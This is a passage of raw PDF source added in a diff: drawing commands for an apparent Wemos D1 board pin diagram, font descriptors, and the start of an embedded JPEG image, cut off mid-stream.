+/F3 15 Tf
+15.00 TL
+0.000 g
+315.00 475.50 Td
+(5V) Tj
+ET
+10.00 w
+BT
+/F3 15 Tf
+15.00 TL
+0.000 g
+305.00 490.50 Td
+(GND) Tj
+ET
+10.00 w
+BT
+/F3 15 Tf
+15.00 TL
+0.000 g
+435.00 535.50 Td
+(D5) Tj
+ET
+10.00 w
+BT
+/F3 15 Tf
+15.00 TL
+0.000 g
+435.00 520.50 Td
+(D6) Tj
+ET
+10.00 w
+BT
+/F3 15 Tf
+15.00 TL
+0.000 g
+435.00 505.50 Td
+(D7) Tj
+ET
+10.00 w
+BT
+/F3 15 Tf
+15.00 TL
+0.000 g
+435.00 490.50 Td
+(D8) Tj
+ET
+10.00 w
+BT
+/F3 15 Tf
+15.00 TL
+0.000 g
+370.00 610.50 Td
+(WEMOS D1) Tj
+ET
+1 J
+1 j
+4.00 w
+0.80 G
+0.00 g
+[] 0 d
+195.000 435.500 m
+195.000 405.500 l
+S
+1 J
+1 j
+4.00 w
+0.80 G
+0.00 g
+[] 0 d
+210.000 435.500 m
+210.000 405.500 l
+S
+1 J
+1 j
+4.00 w
+0.80 G
+0.00 g
+[] 0 d
+225.000 435.500 m
+225.000 405.500 l
+S
+1 J
+1 j
+4.00 w
+0.80 G
+0.00 g
+[] 0 d
+240.000 435.500 m
+240.000 405.500 l
+S
+1 J
+1 j
+4.00 w
+0.80 G
+0.00 g
+[] 0 d
+255.000 435.500 m
+255.000 405.500 l
+S
+1 J
+1 j
+4.00 w
+0.80 G
+0.00 g
+[] 0 d
+270.000 435.500 m
+270.000 405.500 l
+S
+1 J
+1 j
+4.00 w
+0.80 G
+0.00 g
+[] 0 d
+285.000 435.500 m
+285.000 405.500 l
+S
+1 J
+1 j
+4.00 w
+0.80 G
+0.00 g
+[] 0 d
+300.000 435.500 m
+300.000 405.500 l
+S
+1 J
+1 j
+4.00 w
+0.80 G
+0.00 g
+[] 0 d
+315.000 435.500 m
+315.000 405.500 l
+S
+1 J
+1 j
+4.00 w
+0.80 G
+0.00 g
+[] 0 d
+330.000 435.500 m
+330.000 405.500 l
+S
+1 J
+1 j
+4.00 w
+0.80 G
+0.00 g
+[] 0 d
+495.000 435.500 m
+495.000 405.500 l
+S
+1 J
+1 j
+4.00 w
+0.80 G
+0.00 g
+[] 0 d
+510.000 435.500 m
+510.000 405.500 l
+S
+1 J
+1 j
+4.00 w
+0.80 G
+0.00 g
+[] 0 d
+525.000 435.500 m
+525.000 405.500 l
+S
+1 J
+1 j
+4.00 w
+0.80 G
+0.00 g
+[] 0 d
+540.000 435.500 m
+540.000 405.500 l
+S
+1 J
+1 j
+4.00 w
+0.80 G
+0.00 g
+[] 0 d
+555.000 435.500 m
+555.000 405.500 l
+S
+1 J
+1 j
+4.00 w
+0.80 G
+0.00 g
+[] 0 d
+570.000 435.500 m
+570.000 405.500 l
+S
+1 J
+1 j
+4.00 w
+0.80 G
+0.00 g
+[] 0 d
+585.000 435.500 m
+585.000 405.500 l
+S
+1 J
+1 j
+4.00 w
+0.80 G
+0.00 g
+[] 0 d
+600.000 435.500 m
+600.000 405.500 l
+S
+2 J
+0 j
+100 M
+3.00 w
+0.00 G
+[] 0 d
+180.00 605.50 435.00 -175.00 re
+S
+endstream
+endobj
+1 0 obj
+<>
+endobj
+5 0 obj
+<<
+/Descent -209
+/CapHeight 727
+/StemV 0
+/Type /FontDescriptor
+/Flags 32
+/FontBBox [-559 -303 1446 1050]
+/FontName /Verdana
+/ItalicAngle 0
+/Ascent 1005
+>>
+endobj
+6 0 obj
+<>
+endobj
+7 0 obj
+<<
+/Descent -325
+/CapHeight 500
+/StemV 80
+/Type /FontDescriptor
+/Flags 32
+/FontBBox [-665 -325 2000 1006]
+/FontName /Arial,Bold
+/ItalicAngle 0
+/Ascent 1006
+>>
+endobj
+8 0 obj
+<>
+endobj
+9 0 obj
+<<
+/Descent -209
+/CapHeight 727
+/StemV 0
+/Type /FontDescriptor
+/Flags 32
+/FontBBox [-559 -303 1446 1050]
+/FontName /Verdana,Bold
+/ItalicAngle 0
+/Ascent 1005
+>>
+endobj
+10 0 obj
+<>
+endobj
+11 0 obj
+<<
+/Descent -325
+/CapHeight 500
+/StemV 80
+/Type /FontDescriptor
+/Flags 32
+/FontBBox [-665 -325 2000 1006]
+/FontName /Arial
+/ItalicAngle 0
+/Ascent 1006
+>>
+endobj
+12 0 obj
+<>
+endobj
+13 0 obj
+<<
+/Type /XObject
+/Subtype /Image
+/Width 256
+/Height 256
+/ColorSpace /DeviceRGB
+/BitsPerComponent 8
+/Length 81171
+/Filter /DCTDecode
+>>
+stream
+ÿØÿà JFIF ,, ÿá ÊExif MM * b j( 1 r2 „‡i ˜ , , Pixelmator 3.9.1 2021:04:12 04:04:54 ÿá ’http://ns.adobe.com/xap/1.0/